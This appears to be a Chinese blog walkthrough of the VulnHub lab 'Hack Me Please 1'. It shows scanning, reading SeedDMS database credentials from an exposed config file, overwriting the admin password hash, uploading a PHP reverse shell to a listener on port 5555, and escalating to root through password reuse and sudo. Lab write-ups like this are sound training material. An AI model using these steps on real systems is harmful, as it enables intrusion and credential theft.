靶场实战 | Vulnhub-Hack-Me-Please-1

title: Vulnhub-Hack-Me-Please-1
categories:
  - VulnHub
tags:
  - Linux
  - nmap
  - JavaScript
  - gobuster
  - SeedDMS
  - MySQL
  - 文件上传
  - 密文替换
  - sudo
  - .htaccess
cover: /images/Vulnhub.png
abbrlink: 2950c87e
date: 2023-02-11 16:50:38

Vulnhub Hack-Me-Please-1<!--more-->

0x01 靶机介绍

• Name: Hack Me Please: 1

• Date release: 31 Jul 2021

• Author: Saket Sourav

• Series: Hack Me Please

• Description: Get the root

靶机下载地址：

https://www.vulnhub.com/entry/hack-me-please-1,731/

0x02 侦查

端口探测

使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_hack-me-please

扫描结果显示目标开放了3306、80和33060端口

80端口

访问http://192.168.0.106为博客界面

目录扫描

使用 gobuster 进行扫描，但并没有发现可利用目录

gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirb/big.txt -x php

0x03 上线[www-data]

信息收集

在http://192.168.0.106/js/main.js中发现敏感目录

访问http://192.168.0.106/seeddms51x/seeddms-5.1.22/为 seeddms 登录界面

项目地址为：

https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/

相关文件、目录如下：

一般conf目录存在配置文件，但访问

http://192.168.0.106/seeddms51x/conf

提示无权限，猜测可能是.htaccess文件进行了限制

查看源码在conf目录下确实存在该文件，同时还发现settings.xml.template

点击查看.htaccess内容如下

直接访问

http://192.168.0.106/seeddms51x/conf/settings.xml

发现配置信息

成功找到 MySQL 的账号密码和数据库名

database : seeddmsdbuser : seeddmsdbpass : seeddms

MySQL登录

使用以上账号密码成功登录数据库

mysql -h 192.168.0.106 -useeddms -pseeddms -Dseeddms

在当前数据库中找到两个用户表users和tblUsers

mysql > show tables;mysql > select * from users;mysql > select * from tblUsers;

查看表内信息发现用户密码如下，但无法解密表中的密文

saket saurav Saket@#$1337admin f9ef2c539bad8a6d2f3432b6d49ab51a

当然最简单的方式就是替换数据库中的密码，首先生成已知密码的 md5 值

md5 -s 'admin'## 21232f297a57a5a743894a0e4a801fc3

利用 SQL 语句修改用户 admin 密码对应的密文

mysql > update tblUsers set pwd='21232f297a57a5a743894a0e4a801fc3' where id = 1;mysql > select login,pwd from tblUsers where id = 1;

文件上传

使用修改后的密码登录目标应用的管理员用户

在版本信息处发现文件上传点，可能存在文件上传漏洞

首先需要准备用于反弹shell的木马

参考网址：

http://pentestmonkey.net/tools/php-reverse-shell

下载后修改反弹IP和端口为目标IP和端口

$ip = '192.168.0.107';  // CHANGE THIS$port = 5555;       // CHANGE THIS

上传该文件后点击添加文档后会跳到空白页

再次访问文件夹成功发现文件已上传

点击文件查看文件具体信息，其中该文档序号为4且版本为1，但未发现具体目录

使用 gobuster 对http://192.168.0.106/seeddms51x/进行目录扫描，成功发现目录conf、data、pear、www

gobuster dir -u http://192.168.0.106/seeddms51x/ -w /usr/share/wordlists/dirb/big.txt -x php

但在 seeddms 的示例中标明上传的默认路径为1048576

https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/conf/settings.xml.template

在本地监听5555端口

nc -nvlp 5555

根据以上信息构造如下路径，最终发现木马存在于data目录下

/data/1048576/4/1.php/conf/1048576/4/1.php/pear/1048576/4/1.php/www/1048576/4/1.php

访问

http://192.168.0.106/seeddms51x/data/1048576/4/1.php

成功拿到反弹shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

0x04 权限提升[root]

信息收集

查看用户发现用户 saket

cat /etc/passwd | grep -v nologin

该用户在 MySQL 中同样出现，因此推测使用同一密码，切换 saket 用户进行登录

su -l saket

sudo 提权

查看当前用户拥有 sudo 权限

sudo -l

成功提权至 root

sudo sucd ~